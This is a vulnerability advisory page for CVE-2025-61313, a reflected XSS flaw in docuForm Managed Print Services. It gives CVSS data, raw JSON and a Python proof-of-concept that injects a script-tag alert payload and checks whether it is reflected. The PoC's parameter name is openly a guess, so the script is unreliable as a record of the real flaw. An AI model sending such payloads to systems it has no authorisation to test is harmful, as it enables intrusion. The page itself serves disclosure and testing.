Security Vulnerability Report
中文
CVE-2025-61313 CVSS 7.3 HIGH

CVE-2025-61313

Published: 2026-05-11 16:17:29
Last Modified: 2026-05-12 15:05:31

Description

A reflected cross-site scripted (XSS) vulnerability in the dfm-menu_markeralerts.php component of GmbH Mecury Managed Print Services (docuForm) v11.11c allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into an unfiltered variable value.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

GmbH Mecury Managed Print Services (docuForm) v11.11c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def verify_xss(target_url): """ PoC for CVE-2025-61313 Reflected XSS """ # The vulnerable endpoint endpoint = "/dfm-menu_markeralerts.php" # Malicious payload to inject # Using a simple script tag to test execution payload = "<script>alert('CVE-2025-61313')</script>" # Construct the full URL with the payload # Assuming the vulnerable parameter name is 'id' or similar based on common patterns # The exact parameter name should be verified against the source code or advisory attack_url = f"{target_url}{endpoint}?vuln_param={payload}" try: response = requests.get(attack_url, timeout=5) # Check if the payload is reflected in the response body if payload in response.text: print(f"[+] Vulnerability confirmed! Payload reflected in response.") print(f"[+] Attack URL: {attack_url}") return True else: print("[-] Payload not reflected. May be filtered or parameter incorrect.") return False except Exception as e: print(f"[!] Error occurred: {e}") return False if __name__ == "__main__": target = "http://target-host.com" # Replace with actual target verify_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61313", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:28.637", "lastModified": "2026-05-12T15:05:31.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripted (XSS) vulnerability in the dfm-menu_markeralerts.php component of GmbH Mecury Managed Print Services (docuForm) v11.11c allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into an unfiltered variable value."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://ZeroBreach.de", "source": "[email protected]"}, {"url": "https://gist.github.com/ZeroBreach-GmbH/be236a28ffa81c06b915c2a642bff0a5", "source": "[email protected]"}, {"url": "https://www.docuform.de/", "source": "[email protected]"}]}}